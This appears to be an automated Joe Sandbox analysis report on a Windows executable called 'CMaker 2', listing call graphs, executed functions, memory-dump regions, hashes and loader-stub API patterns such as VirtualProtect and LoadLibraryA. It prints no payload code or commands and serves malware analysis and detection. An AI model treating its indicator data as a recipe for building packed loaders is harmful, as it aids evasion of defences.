80636 7ffd9f3b7f40 80637 7ffd9f3b7f6c 80636->80637 80640 7ffd9f3b2590 IsProcessorFeaturePresent RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 80637->80640 80639 7ffd9f3b8027 80640->80639 80641 7ff6fabf9519 80653 7ff6fabf9fd8 80641->80653 80643 7ff6fabf951e 80644 7ff6fabf9545 GetModuleHandleW 80643->80644 80645 7ff6fabf958f 80643->80645 80644->80645 80651 7ff6fabf9552 80644->80651 80646 7ff6fabf941c 11 API calls 80645->80646 80647 7ff6fabf95cb 80646->80647 80648 7ff6fabf95d2 80647->80648 80649 7ff6fabf95e8 11 API calls 80647->80649 80650 7ff6fabf95e4 80649->80650 80651->80645 80652 7ff6fabf9640 GetModuleHandleExW GetProcAddress FreeLibrary 80651->80652 80652->80645 80658 7ff6fabfacd0 45 API calls 3 library calls 80653->80658 80655 7ff6fabf9fe1 80659 7ff6fabfa08c 45 API calls 2 library calls 80655->80659 80658->80655 80660 7ffd93611360 80661 7ffd93611378 80660->80661 80662 7ffd93611486 80661->80662 80664 7ffd935a1c1c 80661->80664 80664->80661 80666 7ffd935e6fb0 80664->80666 80667 7ffd935e7079 80666->80667 80668 7ffd935a1a0f 80666->80668 80667->80661 80668->80666 80671 7ffd935eaaa0 80668->80671 80669 7ffd935a14ec SetLastError 80669->80671 80670 7ffd935eb87f 80672 7ffd935eb8aa 00007FFDB2246570 80670->80672 80677 7ffd935eac23 80670->80677 80671->80669 80671->80670 80671->80677 80673 7ffd935eb8cb 00007FFDB2246570 80672->80673 80672->80677 80674 7ffd935eb8eb 00007FFDB2246570 80673->80674 80673->80677 80675 7ffd935eb902 00007FFDB2246570 80674->80675 80674->80677 80676 7ffd935eb91a 00007FFDB2246570 80675->80676 80675->80677 80676->80677 80677->80666 80678 7ffd8f787b30 80679 7ffd8f787b48 80678->80679 80684 7ffd8f7886d1 80678->80684 80680 7ffd8f788639 VirtualProtect VirtualProtect 80679->80680 80681 7ffd8f7885de LoadLibraryA 80679->80681 80680->80684 80683 7ffd8f7885f8 80681->80683 80683->80679 80685 7ffd8f788617 GetProcAddress 80683->80685 80685->80683 80686 7ffd8f78862e 80685->80686 80687 7ff6fabe9f50 80688 7ff6fabe9f7e 80687->80688 80689 7ff6fabe9f65 80687->80689 80689->80688 80692 7ff6fabfd444 80689->80692 80693 7ff6fabfd48f 80692->80693 80697 7ff6fabfd453 _get_daylight 80692->80697 80700 7ff6fabfb108 11 API calls _get_daylight 80693->80700 80694 7ff6fabfd476 HeapAlloc 80696 7ff6fabe9fde 80694->80696 80694->80697 80697->80693 80697->80694 80699 7ff6fac03390 EnterCriticalSection LeaveCriticalSection _get_daylight 80697->80699 80699->80697 80700->80696 80701 7ffd9f3b1350 80703 7ffd9f3b136f 80701->80703 80702 7ffd9f3b143d 80703->80702 80703->80703 80705 7ffd9f3b1460 80703->80705 80707 7ffd9f3b1486 80705->80707 80706 7ffd9f3b3600 80707->80706 80710 7ffd9f3b14c8 IsProcessorFeaturePresent RtlLookupFunctionEntry RtlVirtualUnwind 80707->80710 80709 7ffd9f3b14a6 80709->80702 80710->80709 80711 7ffd8fd99f90 80716 7ffd8fd9ab86 80711->80716 80719 7ffd8fd99fa8 80711->80719 80712 7ffd8fd9aa93 LoadLibraryA 80713 7ffd8fd9aaad 80712->80713 80717 7ffd8fd9aacc GetProcAddress 80713->80717 80713->80719 80715 7ffd8fd9aaee VirtualProtect VirtualProtect 80715->80716 80716->80716 80717->80713 80718 7ffd8fd9aae3 80717->80718 80719->80712 80719->80715

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 00007FFD935A1A0F Relevance: 23.6, APIs: 5, Strings: 8, Instructions: 891COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $..\s\ssl\record\ssl3_record.c$CONNE$GET $HEAD $POST $PUT $ssl3_get_record
                                                                                                                                                                                  • API String ID: 0-2781224710
                                                                                                                                                                                  • Opcode ID: 0ab4d58f5bb155752d9913eb62b0d51a30b311dd7c242be745a741accbf05ac2
                                                                                                                                                                                  • Instruction ID: e10717c2340c17a6a31e7be9722d50b95530c1ec4790e4e107f13359f9c77f09
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ab4d58f5bb155752d9913eb62b0d51a30b311dd7c242be745a741accbf05ac2
                                                                                                                                                                                  • Instruction Fuzzy Hash: F4928831B0C682A1FBB5DBE1D4A07B927E8EF89B85F444032EA5E67695DE3CE540C301
                                                                                                                                                                                  Function 00007FF6FAC06A4C Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 997 7ff6fac06a4c-7ff6fac06abf call 7ff6fac06780 1000 7ff6fac06ac1-7ff6fac06aca call 7ff6fabfb0e8 997->1000 1001 7ff6fac06ad9-7ff6fac06ae3 call 7ff6fabf80d4 997->1001 1006 7ff6fac06acd-7ff6fac06ad4 call 7ff6fabfb108 1000->1006 1007 7ff6fac06ae5-7ff6fac06afc call 7ff6fabfb0e8 call 7ff6fabfb108 1001->1007 1008 7ff6fac06afe-7ff6fac06b67 CreateFileW 1001->1008 1024 7ff6fac06e1a-7ff6fac06e3a 1006->1024 1007->1006 1010 7ff6fac06be4-7ff6fac06bef GetFileType 1008->1010 1011 7ff6fac06b69-7ff6fac06b6f 1008->1011 1017 7ff6fac06c42-7ff6fac06c49 1010->1017 1018 7ff6fac06bf1-7ff6fac06c2c GetLastError call 7ff6fabfb07c CloseHandle 1010->1018 1014 7ff6fac06bb1-7ff6fac06bdf GetLastError call 7ff6fabfb07c 1011->1014 1015 7ff6fac06b71-7ff6fac06b75 1011->1015 1014->1006 1015->1014 1022 7ff6fac06b77-7ff6fac06baf CreateFileW 1015->1022 1020 7ff6fac06c51-7ff6fac06c54 1017->1020 1021 7ff6fac06c4b-7ff6fac06c4f 1017->1021 1018->1006 1032 7ff6fac06c32-7ff6fac06c3d call 7ff6fabfb108 1018->1032 1027 7ff6fac06c5a-7ff6fac06caf call 7ff6fabf7fec 1020->1027 1028 7ff6fac06c56 1020->1028 1021->1027 1022->1010 1022->1014 1036 7ff6fac06cb1-7ff6fac06cbd call 7ff6fac06988 1027->1036 1037 7ff6fac06cce-7ff6fac06cff call 7ff6fac06500 1027->1037 1028->1027 1032->1006 1036->1037 1044 7ff6fac06cbf 1036->1044 1042 7ff6fac06d05-7ff6fac06d47 1037->1042 1043 7ff6fac06d01-7ff6fac06d03 1037->1043 1046 7ff6fac06d69-7ff6fac06d74 1042->1046 1047 7ff6fac06d49-7ff6fac06d4d 1042->1047 1045 7ff6fac06cc1-7ff6fac06cc9 call 7ff6fabfa648 1043->1045 1044->1045 1045->1024 1049 7ff6fac06d7a-7ff6fac06d7e 1046->1049 1050 7ff6fac06e18 1046->1050 1047->1046 1048 7ff6fac06d4f-7ff6fac06d64 1047->1048 1048->1046 1049->1050 1052 7ff6fac06d84-7ff6fac06dc9 CloseHandle CreateFileW 1049->1052 1050->1024 1054 7ff6fac06dfe-7ff6fac06e13 1052->1054 1055 7ff6fac06dcb-7ff6fac06df9 GetLastError call 7ff6fabfb07c call 7ff6fabf8214 1052->1055 1054->1050 1055->1054
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1617910340-0
                                                                                                                                                                                  • Opcode ID: ad8ec9179d343e41af190c9267fc60de618bf9d8d7a5f79036b78aa83a48160c
                                                                                                                                                                                  • Instruction ID: 0f5ea9560eb0f925106174c7a36dd0a7adb4d7ab6b2d4c5e30e5c30f37ae0354
                                                                                                                                                                                  • Opcode Fuzzy Hash: ad8ec9179d343e41af190c9267fc60de618bf9d8d7a5f79036b78aa83a48160c
                                                                                                                                                                                  • Instruction Fuzzy Hash: F4C1C276B28A4185EB10CFA8C4906AC3771EB49BA8B059279DE6ED77D4EF38D055C300
                                                                                                                                                                                  Function 00007FFD8FD99F90 Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 893librarymemoryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2263360051.00007FFD8FD99000.00000080.00000001.01000000.00000009.sdmp, Offset: 00007FFD8F7C0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2262570350.00007FFD8F7C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2262592946.00007FFD8F7C1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2262592946.00007FFD8FA5A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2262592946.00007FFD8FB16000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2262592946.00007FFD8FB3B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2262592946.00007FFD8FBD5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2262592946.00007FFD8FBD8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2262592946.00007FFD8FCE0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2262592946.00007FFD8FD21000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2262592946.00007FFD8FD2B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2262592946.00007FFD8FD76000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2262592946.00007FFD8FD8D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263393868.00007FFD8FD9B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd8f7c0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                  • String ID: 2v]
                                                                                                                                                                                  • API String ID: 3300690313-3021020117
                                                                                                                                                                                  • Opcode ID: fc96ffb827da1029fa5bea12a6b773e25418914b814a1fa6a1f0ad0adcbac6d3
                                                                                                                                                                                  • Instruction ID: 55f5bb9fd160270c9dc36f40f58ee46d127eafa02695b8a81189b21c2f436552
                                                                                                                                                                                  • Opcode Fuzzy Hash: fc96ffb827da1029fa5bea12a6b773e25418914b814a1fa6a1f0ad0adcbac6d3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B62F03372819286E7198A78951437D77E0F748785F449632EBAFC3784EA3CEA45CB40
                                                                                                                                                                                  Function 00007FFD9DFE3510 Relevance: 6.9, APIs: 4, Instructions: 885librarymemoryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2266691733.00007FFD9DFE3000.00000080.00000001.01000000.00000016.sdmp, Offset: 00007FFD9DFC0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2266316234.00007FFD9DFC0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266399755.00007FFD9DFC1000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266399755.00007FFD9DFDA000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266399755.00007FFD9DFE2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266751869.00007FFD9DFE5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9dfc0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3300690313-0
                                                                                                                                                                                  • Opcode ID: 86e5d6e969dcccc1ed6c727ccbbd95dd599b1fe2912619a2b927021ef4f7fb99
                                                                                                                                                                                  • Instruction ID: 7ba42745a97f221e00f099e125c30dcec6be845d227af4088ab87ec3fa0d4596
                                                                                                                                                                                  • Opcode Fuzzy Hash: 86e5d6e969dcccc1ed6c727ccbbd95dd599b1fe2912619a2b927021ef4f7fb99
                                                                                                                                                                                  • Instruction Fuzzy Hash: 47622A227281D18AE7298EB8D41527DB6E0F744786F045635EADEC37C4FA7CEA49C710
                                                                                                                                                                                  Function 00007FFD8F787B30 Relevance: 6.8, APIs: 4, Instructions: 850librarymemoryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2262504499.00007FFD8F787000.00000080.00000001.01000000.00000011.sdmp, Offset: 00007FFD8F290000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2261414623.00007FFD8F290000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261490839.00007FFD8F291000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261490839.00007FFD8F2A2000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261490839.00007FFD8F2B2000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261490839.00007FFD8F2B8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261490839.00007FFD8F302000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261490839.00007FFD8F317000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261490839.00007FFD8F327000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261490839.00007FFD8F32E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261490839.00007FFD8F33C000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261490839.00007FFD8F5F9000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261490839.00007FFD8F5FB000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261490839.00007FFD8F632000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261490839.00007FFD8F672000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261490839.00007FFD8F6CA000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261490839.00007FFD8F73A000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261490839.00007FFD8F76F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261490839.00007FFD8F781000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2262533228.00007FFD8F789000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd8f290000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3300690313-0
                                                                                                                                                                                  • Opcode ID: fd6e17aede7dd1a07b4ecde7e4701136c40a3ad312db3d6b815d4e7960ab785a
                                                                                                                                                                                  • Instruction ID: 1e2e54d5e0caa6a126efc3d469d2bd222d8c8afb12da027c7ea048367e2b3941
                                                                                                                                                                                  • Opcode Fuzzy Hash: fd6e17aede7dd1a07b4ecde7e4701136c40a3ad312db3d6b815d4e7960ab785a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4262243672859286F7258F3AD81027D77A0F758786F145932EA9EC37C4EA3CEA45CB04
                                                                                                                                                                                  Function 00007FF6FABE76F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                                  • Opcode ID: 37842ddde8711f02792dbd714da93d21ca306dbea5d47a61d34bf991ce214254
                                                                                                                                                                                  • Instruction ID: 2e768a783a0a7ae22f38a0293df91a469b127e27269dcdeeee21dc2aad621e15
                                                                                                                                                                                  • Opcode Fuzzy Hash: 37842ddde8711f02792dbd714da93d21ca306dbea5d47a61d34bf991ce214254
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DF0C262B1864287F7A08B60F48936673A0FB84728F404775DA7E826D4EF3CD0498A00
                                                                                                                                                                                  Function 00007FF6FABE1000 Relevance: 40.6, APIs: 1, Strings: 22, Instructions: 358COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 0 7ff6fabe1000-7ff6fabe26f6 call 7ff6fabeacb0 call 7ff6fabf4f00 call 7ff6fabf5220 call 7ff6fabe25a0 10 7ff6fabe2704-7ff6fabe2726 call 7ff6fabe18d0 0->10 11 7ff6fabe26f8-7ff6fabe26ff 0->11 16 7ff6fabe272c-7ff6fabe2743 call 7ff6fabe1bd0 10->16 17 7ff6fabe2836-7ff6fabe284c call 7ff6fabe31a0 10->17 13 7ff6fabe2a5e-7ff6fabe2a79 call 7ff6fabea9b0 11->13 21 7ff6fabe2748-7ff6fabe278c 16->21 25 7ff6fabe2885-7ff6fabe289a call 7ff6fabe1df0 17->25 26 7ff6fabe284e-7ff6fabe287b call 7ff6fabe6870 17->26 23 7ff6fabe2792-7ff6fabe279a 21->23 24 7ff6fabe2981-7ff6fabe2992 21->24 27 7ff6fabe27a0-7ff6fabe27a4 23->27 29 7ff6fabe2994-7ff6fabe2999 call 7ff6fabe7440 24->29 30 7ff6fabe299b-7ff6fabe299d 24->30 40 7ff6fabe2a56 25->40 44 7ff6fabe289f-7ff6fabe28be call 7ff6fabe1bd0 26->44 45 7ff6fabe287d-7ff6fabe2880 call 7ff6fabee444 26->45 33 7ff6fabe295e-7ff6fabe2973 call 7ff6fabe18c0 27->33 34 7ff6fabe27aa-7ff6fabe27c2 call 7ff6fabf51a0 27->34 37 7ff6fabe29a4-7ff6fabe29b6 call 7ff6fabe7040 29->37 30->37 38 7ff6fabe299f call 7ff6fabe75b0 30->38 33->27 55 7ff6fabe2979 33->55 56 7ff6fabe27c4-7ff6fabe27c8 34->56 57 7ff6fabe27cf-7ff6fabe27e7 call 7ff6fabf51a0 34->57 53 7ff6fabe29dd-7ff6fabe29ec 37->53 54 7ff6fabe29b8-7ff6fabe29be 37->54 38->37 40->13 58 7ff6fabe28c1-7ff6fabe28ca 44->58 45->25 61 7ff6fabe2ab3-7ff6fabe2ad2 call 7ff6fabe30c0 53->61 62 7ff6fabe29f2-7ff6fabe2a10 call 7ff6fabe7040 call 7ff6fabe71b0 53->62 59 7ff6fabe29c0-7ff6fabe29c8 54->59 60 7ff6fabe29ca-7ff6fabe29d8 call 7ff6fabf4c1c 54->60 55->24 56->57 72 7ff6fabe27f4-7ff6fabe280c call 7ff6fabf51a0 57->72 73 7ff6fabe27e9-7ff6fabe27ed 57->73 58->58 64 7ff6fabe28cc-7ff6fabe28e9 call 7ff6fabe18d0 58->64 59->60 60->53 76 7ff6fabe2ad4-7ff6fabe2ade call 7ff6fabe3210 61->76 77 7ff6fabe2ae0-7ff6fabe2af1 call 7ff6fabe1bd0 61->77 88 7ff6fabe2a12-7ff6fabe2a15 62->88 89 7ff6fabe2a84-7ff6fabe2a93 call 7ff6fabe7490 62->89 64->21 80 7ff6fabe28ef-7ff6fabe2900 call 7ff6fabe1df0 64->80 72->33 84 7ff6fabe2812-7ff6fabe2824 call 7ff6fabf5260 72->84 73->72 87 7ff6fabe2af6-7ff6fabe2b10 call 7ff6fabe7800 76->87 77->87 80->40 104 7ff6fabe2905-7ff6fabe2917 call 7ff6fabf5260 84->104 105 7ff6fabe282a-7ff6fabe2831 84->105 99 7ff6fabe2b12-7ff6fabe2b19 87->99 100 7ff6fabe2b1e-7ff6fabe2b30 SetDllDirectoryW 87->100 88->89 94 7ff6fabe2a17-7ff6fabe2a3e call 7ff6fabe1bd0 88->94 101 7ff6fabe2a95-7ff6fabe2a9c 89->101 102 7ff6fabe2a9e-7ff6fabe2aa8 call 7ff6fabe6e70 89->102 110 7ff6fabe2a40 94->110 111 7ff6fabe2a7a-7ff6fabe2a82 call 7ff6fabf4c1c 94->111 106 7ff6fabe2a47 call 7ff6fabe1df0 99->106 107 7ff6fabe2b32-7ff6fabe2b39 100->107 108 7ff6fabe2b3f-7ff6fabe2b5b call 7ff6fabe57b0 call 7ff6fabe5d20 100->108 101->106 102->87 119 7ff6fabe2aaa-7ff6fabe2ab1 102->119 123 7ff6fabe2922-7ff6fabe2934 call 7ff6fabf5260 104->123 124 7ff6fabe2919-7ff6fabe2920 104->124 105->33 120 7ff6fabe2a4c-7ff6fabe2a4e 106->120 107->108 113 7ff6fabe2c95-7ff6fabe2c9e 107->113 140 7ff6fabe2b5d-7ff6fabe2b63 108->140 141 7ff6fabe2bb6-7ff6fabe2bb9 call 7ff6fabe5760 108->141 110->106 111->87 125 7ff6fabe2ca0-7ff6fabe2ca5 call 7ff6fabe7440 113->125 126 7ff6fabe2ca7-7ff6fabe2ca9 113->126 119->106 120->40 137 7ff6fabe293f-7ff6fabe2958 call 7ff6fabf5260 123->137 138 7ff6fabe2936-7ff6fabe293d 123->138 124->33 129 7ff6fabe2cb0-7ff6fabe2cc5 call 7ff6fabe2590 call 7ff6fabe2240 call 7ff6fabe2560 125->129 126->129 130 7ff6fabe2cab call 7ff6fabe75b0 126->130 158 7ff6fabe2cca-7ff6fabe2ce2 call 7ff6fabe59d0 call 7ff6fabe5760 129->158 130->129 137->33 138->33 144 7ff6fabe2b65-7ff6fabe2b72 call 7ff6fabe57f0 140->144 145 7ff6fabe2b7d-7ff6fabe2b87 call 7ff6fabe5b90 140->145 150 7ff6fabe2bbe-7ff6fabe2bc5 141->150 144->145 159 7ff6fabe2b74-7ff6fabe2b7b 144->159 156 7ff6fabe2b92-7ff6fabe2ba0 call 7ff6fabe5ef0 145->156 157 7ff6fabe2b89-7ff6fabe2b90 145->157 150->113 154 7ff6fabe2bcb-7ff6fabe2bd5 call 7ff6fabe22a0 150->154 154->120 168 7ff6fabe2bdb-7ff6fabe2bf0 call 7ff6fabe7420 154->168 156->150 170 7ff6fabe2ba2 156->170 161 7ff6fabe2ba9-7ff6fabe2bb1 call 7ff6fabe1df0 call 7ff6fabe59d0 157->161 159->161 161->141 176 7ff6fabe2bf2-7ff6fabe2bf7 call 7ff6fabe7440 168->176 177 7ff6fabe2bf9-7ff6fabe2bfb 168->177 170->161 179 7ff6fabe2c02-7ff6fabe2c45 call 7ff6fabe7150 call 7ff6fabe71f0 call 7ff6fabe59d0 call 7ff6fabe5760 call 7ff6fabe70f0 176->179 177->179 180 7ff6fabe2bfd call 7ff6fabe75b0 177->180 193 7ff6fabe2c82-7ff6fabe2c90 call 7ff6fabe1880 179->193 194 7ff6fabe2c47-7ff6fabe2c55 179->194 180->179 193->120 195 7ff6fabe2c57-7ff6fabe2c71 call 7ff6fabe1df0 call 7ff6fabe1880 194->195 196 7ff6fabe2c76-7ff6fabe2c7d call 7ff6fabe1df0 194->196 195->120 196->193
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
